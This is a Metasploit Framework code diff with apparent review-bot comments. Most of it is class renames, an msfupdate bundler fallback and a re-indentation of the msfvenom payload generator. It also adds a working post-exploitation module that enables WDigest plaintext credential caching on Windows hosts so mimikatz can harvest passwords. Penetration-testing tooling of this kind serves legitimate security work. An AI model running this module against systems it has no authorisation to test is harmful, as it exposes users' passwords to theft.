b/modules/post/windows/manage/smart_migrate.rb index 9abc02bc75..51a7bae487 100644 --- a/modules/post/windows/manage/smart_migrate.rb +++ b/modules/post/windows/manage/smart_migrate.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Module::Deprecated 
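Review bot: Replacing `datastore['ACTIVE']==true` with a bare truthiness test changes behaviour if the datastore ever holds the string form of the option, because `"false"` is truthy in Ruby while the old comparison treated it as false. The same applies to `datastore['NULLAUTH']` in the second rpcapd_start.rb hunk and to `datastore['ZERO']` in the sdel.rb hunk. If all three are registered as OptBool and the datastore normalizes them, the change is safe, but the registration is outside these hunks and should be confirmed. NULLAUTH deserves the closest look, since a wrongly truthy value appends `-n`, which by the option name starts the service without authentication. The `run` bodies continue outside the hunks.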
diff --git a/modules/post/windows/manage/sticky_keys.rb b/modules/post/windows/manage/sticky_keys.rb index ce5bdbc771..e807ae2caf 100644 --- a/modules/post/windows/manage/sticky_keys.rb +++ b/modules/post/windows/manage/sticky_keys.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/manage/vss_create.rb b/modules/post/windows/manage/vss_create.rb index a377af66a8..a4ce9d424c 100644 --- a/modules/post/windows/manage/vss_create.rb +++ b/modules/post/windows/manage/vss_create.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::ShadowCopy diff --git a/modules/post/windows/manage/vss_list.rb b/modules/post/windows/manage/vss_list.rb index 35737fb343..3d3d1c5572 100644 --- a/modules/post/windows/manage/vss_list.rb +++ b/modules/post/windows/manage/vss_list.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::ShadowCopy diff --git a/modules/post/windows/manage/vss_mount.rb b/modules/post/windows/manage/vss_mount.rb index d71fe54b43..36b43bfe00 100644 --- a/modules/post/windows/manage/vss_mount.rb +++ b/modules/post/windows/manage/vss_mount.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::ShadowCopy diff --git a/modules/post/windows/manage/vss_set_storage.rb b/modules/post/windows/manage/vss_set_storage.rb index c61fd6e128..2a969572d8 100644 --- a/modules/post/windows/manage/vss_set_storage.rb +++ b/modules/post/windows/manage/vss_set_storage.rb 
@@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::ShadowCopy diff --git a/modules/post/windows/manage/vss_storage.rb b/modules/post/windows/manage/vss_storage.rb index 599902d94c..e94a6a68e4 100644 --- a/modules/post/windows/manage/vss_storage.rb +++ b/modules/post/windows/manage/vss_storage.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::ShadowCopy diff --git a/modules/post/windows/manage/wdigest_caching.rb b/modules/post/windows/manage/wdigest_caching.rb new file mode 100644 index 0000000000..f792e2e9b0 --- /dev/null +++ b/modules/post/windows/manage/wdigest_caching.rb 
@@ -0,0 +1,98 @@ +require 'msf/core' +require 'rex' +require 'msf/core/auxiliary/report' + +class MetasploitModule < Msf::Post + include Msf::Post::Windows::Registry + + WDIGEST_REG_LOCATION = 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest' + USE_LOGON_CREDENTIAL = 'UseLogonCredential' + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Windows Post Manage WDigest Credential Caching', + 'Description' => %q{ + On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. This module enables/disables + credential caching by adding/changing the value of the UseLogonCredential DWORD under the WDIGEST provider's Registry key. + Any subsequest logins will allow mimikatz to recover the plain text passwords from the system's memory. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>'], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ] + )) + + register_options( + [ + OptBool.new('ENABLE',[false,'Enable the WDigest Credential Cache.',true]) + ], self.class) + end + + # Run Method for when run command is issued + def run + print_status("Running module against #{sysinfo['Computer']}") + # Check if OS is 8/2012 or newer. If not, no need to set the registry key + # Can be backported to Windows 7, 2k8R2 but defaults to enabled... + if sysinfo['OS'] =~ /Windows (XP|Vista|200[03])/i + print_status('Older Windows version detected. No need to enable the WDigest Security Provider. Exiting...') + else + datastore['ENABLE'] ? wdigest_enable : wdigest_disable + end + end + + def get_key + # Check if the key exists. Not present by default + print_status("Checking if the #{WDIGEST_REG_LOCATION}\\#{USE_LOGON_CREDENTIAL} DWORD exists...") + begin + wdvalue = registry_getvaldata(WDIGEST_REG_LOCATION, USE_LOGON_CREDENTIAL) + key_exists = !wdvalue.nil? 
+ + print_status("#{USE_LOGON_CREDENTIAL} is set to #{wdvalue}") if key_exists + return wdvalue + rescue Rex::Post::Meterpreter::RequestError => e + fail_with(Failure::Unknown, "Unable to access registry key: #{e}") + end + end + + def wdigest_enable + wdvalue = get_key + key_exists = !wdvalue.nil? + # If it is not present, create it + if key_exists && wdvalue == 1 + print_good('Registry value is already set. WDigest Security Provider is enabled') + else + begin + verb = key_exists ? 'Setting' : 'Creating' + print_status("#{verb} #{USE_LOGON_CREDENTIAL} DWORD value as 1...") + if registry_setvaldata(WDIGEST_REG_LOCATION, USE_LOGON_CREDENTIAL, 1, 'REG_DWORD') + print_good('WDigest Security Provider enabled') + else + print_error('Unable to access registry key - insufficient privileges?') + end + rescue Rex::Post::Meterpreter::RequestError => e + fail_with(Failure::Unknown, "Unable to access registry key: #{e}") + end + end + end + + def wdigest_disable + wdvalue = get_key + key_exists = !wdvalue.nil? + # If it is not present, create it + if key_exists && wdvalue == 0 + print_good('Registry value is already set. WDigest Security Provider is disabled') + else + begin + verb = key_exists ? 'Setting' : 'Creating' + print_status("#{verb} #{USE_LOGON_CREDENTIAL} DWORD value as 0...") + if registry_setvaldata(WDIGEST_REG_LOCATION, USE_LOGON_CREDENTIAL, 0, 'REG_DWORD') + print_good('WDigest Security Provider disabled') + else + print_error('Unable to access registry key - insufficient privileges?') + end + rescue Rex::Post::Meterpreter::RequestError => e + fail_with(Failure::Unknown, "Unable to access registry key: #{e}") + end + end + end +end diff --git a/modules/post/windows/manage/webcam.rb b/modules/post/windows/manage/webcam.rb index eb156773d4..b309721d89 100644 --- a/modules/post/windows/manage/webcam.rb +++ b/modules/post/windows/manage/webcam.rb 
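Review bot: `wdigest_enable` and `wdigest_disable` are the same method apart from the DWORD value (1 or 0) and the state word in the messages, so any later fix has to be made twice. Folding both into one private helper that takes the value and the state word keeps the two entry points and removes the copy. The comment `# If it is not present, create it` sits above the already-set check in both methods, where it describes the `else` branch rather than the line below it; the helper below replaces it with a guard clause. The Description also has the typo "subsequest" for "subsequent".

```ruby
  def wdigest_enable
    wdigest_set(1, 'enabled')
  end

  def wdigest_disable
    wdigest_set(0, 'disabled')
  end

  # Writes UseLogonCredential only when the current value differs from +value+.
  def wdigest_set(value, state)
    wdvalue = get_key
    key_exists = !wdvalue.nil?
    if key_exists && wdvalue == value
      print_good("Registry value is already set. WDigest Security Provider is #{state}")
      return
    end

    verb = key_exists ? 'Setting' : 'Creating'
    print_status("#{verb} #{USE_LOGON_CREDENTIAL} DWORD value as #{value}...")
    if registry_setvaldata(WDIGEST_REG_LOCATION, USE_LOGON_CREDENTIAL, value, 'REG_DWORD')
      print_good("WDigest Security Provider #{state}")
    else
      print_error('Unable to access registry key - insufficient privileges?')
    end
  rescue Rex::Post::Meterpreter::RequestError => e
    fail_with(Failure::Unknown, "Unable to access registry key: #{e}")
  end
```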
@@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/recon/computer_browser_discovery.rb b/modules/post/windows/recon/computer_browser_discovery.rb index cc2ad55784..0a87c7dc3b 100644 --- a/modules/post/windows/recon/computer_browser_discovery.rb +++ b/modules/post/windows/recon/computer_browser_discovery.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/recon/outbound_ports.rb b/modules/post/windows/recon/outbound_ports.rb index 31196ce2c6..6c7c9f5460 100644 --- a/modules/post/windows/recon/outbound_ports.rb +++ b/modules/post/windows/recon/outbound_ports.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv def initialize(info={}) diff --git a/modules/post/windows/recon/resolve_ip.rb b/modules/post/windows/recon/resolve_ip.rb index 4e3028f341..2734a2655d 100644 --- a/modules/post/windows/recon/resolve_ip.rb +++ b/modules/post/windows/recon/resolve_ip.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/wlan/wlan_bss_list.rb b/modules/post/windows/wlan/wlan_bss_list.rb index 00baa5c710..e1b324d38a 100644 --- a/modules/post/windows/wlan/wlan_bss_list.rb +++ b/modules/post/windows/wlan/wlan_bss_list.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report def initialize(info={}) 
diff --git a/modules/post/windows/wlan/wlan_current_connection.rb b/modules/post/windows/wlan/wlan_current_connection.rb index a34db4f8c2..e4c9f60808 100644 --- a/modules/post/windows/wlan/wlan_current_connection.rb +++ b/modules/post/windows/wlan/wlan_current_connection.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report def initialize(info={}) diff --git a/modules/post/windows/wlan/wlan_disconnect.rb b/modules/post/windows/wlan/wlan_disconnect.rb index 20ef90546a..284203dc98 100644 --- a/modules/post/windows/wlan/wlan_disconnect.rb +++ b/modules/post/windows/wlan/wlan_disconnect.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report def initialize(info={}) diff --git a/modules/post/windows/wlan/wlan_profile.rb b/modules/post/windows/wlan/wlan_profile.rb index b16b0965e7..ab7d8e4252 100644 --- a/modules/post/windows/wlan/wlan_profile.rb +++ b/modules/post/windows/wlan/wlan_profile.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report def initialize(info={}) diff --git a/msfupdate b/msfupdate index 76d16f5afe..7ea3426c35 100755 --- a/msfupdate +++ b/msfupdate @@ -185,7 +185,14 @@ class Msfupdate system("git", "merge", "#{remote}/#{branch}") stdout.puts "[*] Updating gems..." - require 'bundler' + begin + require 'bundler' + rescue LoadError + stderr.puts '[*] Installing bundler' + system('gem', 'install', 'bundler') + Gem.clear_paths + require 'bundler' + end Bundler.with_clean_env do system("bundle", "install") end diff --git a/msfvenom b/msfvenom index 045cb07e78..6c25288081 100755 --- a/msfvenom +++ b/msfvenom 
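Review bot: The return value of `system('gem', 'install', 'bundler')` in the msfupdate hunk is ignored, so when the install fails (no network, no write access to the gem directory) the second `require 'bundler'` raises a bare LoadError with no hint about the cause. Checking the result gives a clear failure, for example `raise 'Could not install bundler; install it manually and re-run msfupdate' unless system('gem', 'install', 'bundler')`; how the caller handles that exception is outside the hunk and should be checked. The install is also unpinned and runs whichever `gem` is first on PATH, which deserves a comment for anyone running msfupdate with elevated privileges. The enclosing method starts and ends outside the hunk.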
@@ -17,356 +17,345 @@ require 'msf/base' require 'msf/core/payload_generator' - class MsfVenomError < StandardError; end - class UsageError < MsfVenomError; end - class NoTemplateError < MsfVenomError; end - class IncompatibleError < MsfVenomError; end +class MsfVenomError < StandardError; end +class UsageError < MsfVenomError; end +class NoTemplateError < MsfVenomError; end +class IncompatibleError < MsfVenomError; end - require 'optparse' +require 'optparse' - # Creates a new framework object. - # - # @note Ignores any previously cached value. - # @param (see ::Msf::Simple::Framework.create) - # @return [Msf::Framework] - def init_framework(create_opts={}) - create_opts[:module_types] ||= [ - ::Msf::MODULE_PAYLOAD, ::Msf::MODULE_ENCODER, ::Msf::MODULE_NOP - ] - @framework = ::Msf::Simple::Framework.create(create_opts.merge('DisableDatabase' => true)) +# Creates a new framework object. +# +# @note Ignores any previously cached value. +# @param (see ::Msf::Simple::Framework.create) +# @return [Msf::Framework] +def init_framework(create_opts={}) + create_opts[:module_types] ||= [ + ::Msf::MODULE_PAYLOAD, ::Msf::MODULE_ENCODER, ::Msf::MODULE_NOP + ] + @framework = ::Msf::Simple::Framework.create(create_opts.merge('DisableDatabase' => true)) +end + +# Cached framework object +# +# @return [Msf::Framework] +def framework + return @framework if @framework + + init_framework + + @framework +end + + +def parse_args(args) + opts = {} + datastore = {} + opt = OptionParser.new + banner = "MsfVenom - a Metasploit standalone payload generator.\n" + banner << "Also a replacement for msfpayload and msfencode.\n" + banner << "Usage: #{$0} [options] <var=val>" + opt.banner = banner + opt.separator('') + opt.separator('Options:') + + opt.on('-p', '--payload <payload>', String, + 'Payload to use. 
Specify a \'-\' or stdin to use custom payloads') do |p| + if p == '-' + opts[:payload] = 'stdin' + else + opts[:payload] = p + end end - # Cached framework object - # - # @return [Msf::Framework] - def framework - return @framework if @framework - - init_framework - - @framework + opt.on('--payload-options', "List the payload's standard options") do + opts[:list_options] = true end - - def parse_args(args) - opts = {} - datastore = {} - opt = OptionParser.new - banner = "MsfVenom - a Metasploit standalone payload generator.\n" - banner << "Also a replacement for msfpayload and msfencode.\n" - banner << "Usage: #{$0} [options] <var=val>" - opt.banner = banner - opt.separator('') - opt.separator('Options:') - - opt.on('-p', '--payload <payload>', String, - 'Payload to use. Specify a \'-\' or stdin to use custom payloads') do |p| - if p == '-' - opts[:payload] = 'stdin' - else - opts[:payload] = p - end + opt.on('-l', '--list [type]', Array, 'List a module type. Options are: payloads, encoders, nops, all') do |l| + if l.nil? or l.empty? 
+ l = ["all"] end + opts[:list] = l + end - opt.on('--payload-options', "List the payload's standard options") do - opts[:list_options] = true + opt.on('-n', '--nopsled <length>', Integer, 'Prepend a nopsled of [length] size on to the payload') do |n| + opts[:nops] = n.to_i + end + + opt.on('-f', '--format <format>', String, "Output format (use --help-formats for a list)") do |f| + opts[:format] = f + end + + opt.on('--help-formats', String, "List available formats") do + init_framework(:module_types => []) + msg = "Executable formats\n" + + "\t" + ::Msf::Util::EXE.to_executable_fmt_formats.join(", ") + "\n" + + "Transform formats\n" + + "\t" + ::Msf::Simple::Buffer.transform_formats.join(", ") + raise UsageError, msg + end + + opt.on('-e', '--encoder <encoder>', String, 'The encoder to use') do |e| + opts[:encoder] = e + end + + opt.on('-a', '--arch <arch>', String, 'The architecture to use') do |a| + opts[:arch] = a + end + + opt.on('--platform <platform>', String, 'The platform of the payload') do |l| + opts[:platform] = l + end + + opt.on('--help-platforms', String, 'List available platforms') do + init_framework(:module_types => []) + supported_platforms = [] + Msf::Module::Platform.subclasses.each {|c| supported_platforms << "#{c.realname.downcase}"} + msg = "Platforms\n" + + "\t" + supported_platforms * ", " + raise UsageError, msg + end + + opt.on('-s', '--space <length>', Integer, 'The maximum size of the resulting payload') do |s| + opts[:space] = s + end + + opt.on('--encoder-space <length>', Integer, 'The maximum size of the encoded payload (defaults to the -s value)') do |s| + opts[:encoder_space] = s + end + + opt.on('-b', '--bad-chars <list>', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b| + opts[:badchars] = Rex::Text.hex_to_raw(b) + end + + opt.on('-i', '--iterations <count>', Integer, 'The number of times to encode the payload') do |i| + opts[:iterations] = i + end + + opt.on('-c', '--add-code <path>', String, 'Specify an 
additional win32 shellcode file to include') do |x| + opts[:add_code] = x + end + + opt.on('-x', '--template <path>', String, 'Specify a custom executable file to use as a template') do |x| + opts[:template] = x + end + + opt.on('-k', '--keep', 'Preserve the template behavior and inject the payload as a new thread') do + opts[:keep] = true + end + + opt.on('-o', '--out <path>', 'Save the payload') do |x| + opts[:out] = x + end + + opt.on('-v', '--var-name <name>', String, 'Specify a custom variable name to use for certain output formats') do |x| + opts[:var_name] = x + end + + opt.on('--smallest', 'Generate the smallest possible payload') do + opts[:smallest] = true + end + + opt.on_tail('-h', '--help', 'Show this message') do + raise UsageError, "#{opt}" + end + + begin + opt.parse!(args) + rescue OptionParser::InvalidOption => e + raise UsageError, "Invalid option\n#{opt}" + rescue OptionParser::MissingArgument => e + raise UsageError, "Missing required argument for option\n#{opt}" + end + + if opts.empty? + raise UsageError, "No options\n#{opt}" + end + + if args + args.each do |x| + k,v = x.split('=', 2) + datastore[k.upcase] = v.to_s end - - opt.on('-l', '--list [type]', Array, 'List a module type. Options are: payloads, encoders, nops, all') do |l| - if l.nil? or l.empty? - l = ["all"] - end - opts[:list] = l + if opts[:payload].to_s =~ /[\_\/]reverse/ and datastore['LHOST'].nil? 
+ datastore['LHOST'] = Rex::Socket.source_address end + end - opt.on('-n', '--nopsled <length>', Integer, 'Prepend a nopsled of [length] size on to the payload') do |n| - opts[:nops] = n.to_i - end - - opt.on('-f', '--format <format>', String, "Output format (use --help-formats for a list)") do |f| - opts[:format] = f - end - - opt.on('--help-formats', String, "List available formats") do - init_framework(:module_types => []) - msg = "Executable formats\n" + - "\t" + ::Msf::Util::EXE.to_executable_fmt_formats.join(", ") + "\n" + - "Transform formats\n" + - "\t" + ::Msf::Simple::Buffer.transform_formats.join(", ") - raise UsageError, msg - end - - opt.on('-e', '--encoder <encoder>', String, 'The encoder to use') do |e| - opts[:encoder] = e - end - - opt.on('-a', '--arch <arch>', String, 'The architecture to use') do |a| - opts[:arch] = a - end - - opt.on('--platform <platform>', String, 'The platform of the payload') do |l| - opts[:platform] = l - end - - opt.on('--help-platforms', String, 'List available platforms') do - init_framework(:module_types => []) - supported_platforms = [] - Msf::Module::Platform.subclasses.each {|c| supported_platforms << "#{c.realname.downcase}"} - msg = "Platforms\n" + - "\t" + supported_platforms * ", " - raise UsageError, msg - end - - opt.on('-s', '--space <length>', Integer, 'The maximum size of the resulting payload') do |s| - opts[:space] = s - end - - opt.on('--encoder-space <length>', Integer, 'The maximum size of the encoded payload (defaults to the -s value)') do |s| - opts[:encoder_space] = s - end - - opt.on('-b', '--bad-chars <list>', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b| - opts[:badchars] = Rex::Text.hex_to_raw(b) - end - - opt.on('-i', '--iterations <count>', Integer, 'The number of times to encode the payload') do |i| - opts[:iterations] = i - end - - opt.on('-c', '--add-code <path>', String, 'Specify an additional win32 shellcode file to include') do |x| - opts[:add_code] = x - end - - 
opt.on('-x', '--template <path>', String, 'Specify a custom executable file to use as a template') do |x| - opts[:template] = x - end - - opt.on('-k', '--keep', 'Preserve the template behavior and inject the payload as a new thread') do - opts[:keep] = true - end - - opt.on('-o', '--out <path>', 'Save the payload') do |x| - opts[:out] = x - end - - opt.on('-v', '--var-name <name>', String, 'Specify a custom variable name to use for certain output formats') do |x| - opts[:var_name] = x - end - - opt.on('--smallest', 'Generate the smallest possible payload') do - opts[:smallest] = true - end - - opt.on_tail('-h', '--help', 'Show this message') do - raise UsageError, "#{opt}" - end + if opts[:payload].nil? # if no payload option is selected assume we are reading it from stdin + opts[:payload] = "stdin" + end + if opts[:payload] == 'stdin' and not opts[:list] + $stderr.puts "Attempting to read payload from STDIN..." begin - opt.parse!(args) - rescue OptionParser::InvalidOption => e - raise UsageError, "Invalid option\n#{opt}" - rescue OptionParser::MissingArgument => e - raise UsageError, "Missing required argument for option\n#{opt}" - end - - if opts.empty? - raise UsageError, "No options\n#{opt}" - end - - if args - args.each do |x| - k,v = x.split('=', 2) - datastore[k.upcase] = v.to_s - end - if opts[:payload].to_s =~ /[\_\/]reverse/ and datastore['LHOST'].nil? - datastore['LHOST'] = Rex::Socket.source_address + ::Timeout.timeout(30) do + opts[:stdin] = payload_stdin end + rescue Timeout::Error + opts[:stdin] = '' end - - if opts[:payload].nil? # if no payload option is selected assume we are reading it from stdin - opts[:payload] = "stdin" - end - - if opts[:payload] == 'stdin' and not opts[:list] - $stderr.puts "Attempting to read payload from STDIN..." 
- begin - ::Timeout.timeout(30) do - opts[:stdin] = payload_stdin - end - rescue Timeout::Error - opts[:stdin] = '' - end - end - - opts[:datastore] = datastore - - opts end + opts[:datastore] = datastore - # Read a raw payload from stdin (or whatever IO object we're currently - # using as stdin, see {#initialize}) - # - # @return [String] - def payload_stdin - @in = $stdin - @in.binmode - payload = @in.read - payload - end + opts +end - def dump_payloads - init_framework(:module_types => [ ::Msf::MODULE_PAYLOAD ]) - tbl = Rex::Ui::Text::Table.new( - 'Indent' => 4, - 'Header' => "Framework Payloads (#{framework.stats.num_payloads} total)", - 'Columns' => - [ - "Name", - "Description" - ]) - framework.payloads.each_module { |name, mod| - tbl << [ name, mod.new.description.split.join(' ') ] - } +# Read a raw payload from stdin (or whatever IO object we're currently +# using as stdin, see {#initialize}) +# +# @return [String] +def payload_stdin + @in = $stdin + @in.binmode + payload = @in.read + payload +end - "\n" + tbl.to_s + "\n" - end +def dump_payloads + init_framework(:module_types => [ ::Msf::MODULE_PAYLOAD ]) + tbl = Rex::Ui::Text::Table.new( + 'Indent' => 4, + 'Header' => "Framework Payloads (#{framework.stats.num_payloads} total)", + 'Columns' => + [ + "Name", + "Description" + ]) - def dump_encoders(arch = nil) - init_framework(:module_types => [ ::Msf::MODULE_ENCODER ]) - tbl = Rex::Ui::Text::Table.new( - 'Indent' => 4, - 'Header' => "Framework Encoders" + ((arch) ? " (architectures: #{arch})" : ""), - 'Columns' => - [ - "Name", - "Rank", - "Description" - ]) - cnt = 0 + framework.payloads.each_module { |name, mod| + tbl << [ name, mod.new.description.split.join(' ') ] + } - framework.encoders.each_module( - 'Arch' => arch ? 
arch.split(',') : nil) { |name, mod| + "\n" + tbl.to_s + "\n" +end + +def dump_encoders(arch = nil) + init_framework(:module_types => [ ::Msf::MODULE_ENCODER ]) + tbl = Rex::Ui::Text::Table.new( + 'Indent' => 4, + 'Header' => "Framework Encoders" + ((arch) ? " (architectures: #{arch})" : ""), + 'Columns' => + [ + "Name", + "Rank", + "Description" + ]) + cnt = 0 + + framework.encoders.each_module( + 'Arch' => arch ? arch.split(',') : nil) { |name, mod| tbl << [ name, mod.rank_to_s, mod.new.name ] cnt += 1 } (cnt > 0) ? "\n" + tbl.to_s + "\n" : "\nNo compatible encoders found.\n\n" - end +end - def dump_nops - init_framework(:module_types => [ ::Msf::MODULE_NOP ]) - tbl = Rex::Ui::Text::Table.new( - 'Indent' => 4, - 'Header' => "Framework NOPs (#{framework.stats.num_nops} total)", - 'Columns' => - [ - "Name", - "Description" - ]) +def dump_nops + init_framework(:module_types => [ ::Msf::MODULE_NOP ]) + tbl = Rex::Ui::Text::Table.new( + 'Indent' => 4, + 'Header' => "Framework NOPs (#{framework.stats.num_nops} total)", + 'Columns' => + [ + "Name", + "Description" + ]) - framework.nops.each_module { |name, mod| - tbl << [ name, mod.new.description.split.join(' ') ] - } + framework.nops.each_module { |name, mod| + tbl << [ name, mod.new.description.split.join(' ') ] + } - "\n" + tbl.to_s + "\n" - end + "\n" + tbl.to_s + "\n" +end -if __FILE__ == $0 +begin + generator_opts = parse_args(ARGV) +rescue MsfVenomError, Msf::OptionValidateError => e + $stderr.puts "Error: #{e.message}" + exit(1) +end - begin - generator_opts = parse_args(ARGV) - rescue MsfVenomError, Msf::OptionValidateError => e - $stderr.puts "Error: #{e.message}" - exit(1) - end - - if generator_opts[:list] - generator_opts[:list].each do |mod| - case mod.downcase - when "payloads" - $stdout.puts dump_payloads - when "encoders" - $stdout.puts dump_encoders(generator_opts[:arch]) - when "nops" - $stdout.puts dump_nops - when "all" - # Init here so #dump_payloads doesn't create a framework with - # only 
payloads, etc. - init_framework - $stdout.puts dump_payloads - $stdout.puts dump_encoders - $stdout.puts dump_nops - else - if mod == 'payload' - question = ". Do you mean 'payloads'?" - elsif mod == 'encoder' - question = ". Do you mean 'encoders'?" - elsif mod == 'nop' - quesetion = ". Do you mean 'nops'?" - end - $stderr.puts "Invalid module type#{question}" - end +if generator_opts[:list] + generator_opts[:list].each do |mod| + case mod.downcase + when "payloads", "payload", "p" + $stdout.puts dump_payloads + when "encoders", "encoder", "e" + $stdout.puts dump_encoders(generator_opts[:arch]) + when "nops", "nop", "n" + $stdout.puts dump_nops + when "all" + # Init here so #dump_payloads doesn't create a framework with + # only payloads, etc. + init_framework + $stdout.puts dump_payloads + $stdout.puts dump_encoders + $stdout.puts dump_nops + else + $stderr.puts "Invalid module type. These are valid: payloads, encoders, nops, all" end - exit(0) + end + exit(0) +end + +if generator_opts[:list_options] + payload_mod = framework.payloads.create(generator_opts[:payload]) + + if payload_mod.nil? + $stderr.puts "Invalid payload: #{generator_opts[:payload]}" + exit end - if generator_opts[:list_options] - payload_mod = framework.payloads.create(generator_opts[:payload]) + $stderr.puts "Options for #{payload_mod.fullname}:\n\n" + $stdout.puts ::Msf::Serializer::ReadableText.dump_module(payload_mod, ' ') - if payload_mod.nil? 
- $stderr.puts "Invalid payload: #{generator_opts[:payload]}" - exit - end + $stderr.puts "Advanced options for #{payload_mod.fullname}:\n\n" + $stdout.puts ::Msf::Serializer::ReadableText.dump_advanced_options(payload_mod, ' ') - $stderr.puts "Options for #{payload_mod.fullname}:\n\n" - $stdout.puts ::Msf::Serializer::ReadableText.dump_module(payload_mod, ' ') + $stderr.puts "Evasion options for #{payload_mod.fullname}:\n\n" + $stdout.puts ::Msf::Serializer::ReadableText.dump_evasion_options(payload_mod, ' ') + exit(0) +end - $stderr.puts "Advanced options for #{payload_mod.fullname}:\n\n" - $stdout.puts ::Msf::Serializer::ReadableText.dump_advanced_options(payload_mod, ' ') +generator_opts[:framework] = framework +generator_opts[:cli] = true - $stderr.puts "Evasion options for #{payload_mod.fullname}:\n\n" - $stdout.puts ::Msf::Serializer::ReadableText.dump_evasion_options(payload_mod, ' ') - exit(0) - end +begin + venom_generator = Msf::PayloadGenerator.new(generator_opts) + payload = venom_generator.generate_payload +rescue ::Exception => e + elog("#{e.class} : #{e.message}\n#{e.backtrace * "\n"}") + $stderr.puts "Error: #{e.message}" +end - generator_opts[:framework] = framework - generator_opts[:cli] = true +# No payload generated, no point to go on +exit(2) unless payload +if generator_opts[:out] begin - venom_generator = Msf::PayloadGenerator.new(generator_opts) - payload = venom_generator.generate_payload + ::File.open(generator_opts[:out], 'wb') do |f| + f.write(payload) + end + $stderr.puts "Saved as: #{generator_opts[:out]}" rescue ::Exception => e + # If I can't save it, then I can't save it. I don't think it matters what error. 
elog("#{e.class} : #{e.message}\n#{e.backtrace * "\n"}") $stderr.puts "Error: #{e.message}" end - - # No payload generated, no point to go on - exit(2) unless payload - - if generator_opts[:out] - begin - ::File.open(generator_opts[:out], 'wb') do |f| - f.write(payload) - end - $stderr.puts "Saved as: #{generator_opts[:out]}" - rescue ::Exception => e - # If I can't save it, then I can't save it. I don't think it matters what error. - elog("#{e.class} : #{e.message}\n#{e.backtrace * "\n"}") - $stderr.puts "Error: #{e.message}" - end - else - output_stream = $stdout - output_stream.binmode - output_stream.write payload - # trailing newline for pretty output - $stderr.puts unless payload =~ /\n$/ - end - +else + output_stream = $stdout + output_stream.binmode + output_stream.write payload + # trailing newline for pretty output + $stderr.puts unless payload =~ /\n$/ end diff --git a/plugins/nessus.rb b/plugins/nessus.rb index 99195b7cf0..7e31a2738c 100644 --- a/plugins/nessus.rb +++ b/plugins/nessus.rb @@ -36,10 +36,6 @@ module Msf "#{Msf::Config.local_directory}" end - def cmd_nessus_index - nessus_index - end - def commands { "nessus_connect" => "Connect to a nessus server: nconnect username:password@hostname:port <verify_ssl>", 
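Review bot: Dropping the `if __FILE__ == $0` guard in msfvenom means `parse_args(ARGV)` and payload generation now run whenever the file is loaded, not only when it is executed, so `init_framework`, `parse_args` and the `dump_*` helpers can no longer be loaded on their own (for example from a spec) without side effects. If the guard was removed only to flatten the indentation, keep it around the driver section that begins with `generator_opts = parse_args(ARGV)`. In the `--payload-options` branch, the invalid-payload path calls a bare `exit`, which reports status 0 after printing an error; `exit(1)` would match the other error paths. Both `rescue ::Exception => e` clauses also catch Interrupt and SystemExit, so a plain `rescue => e` is probably what is intended.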
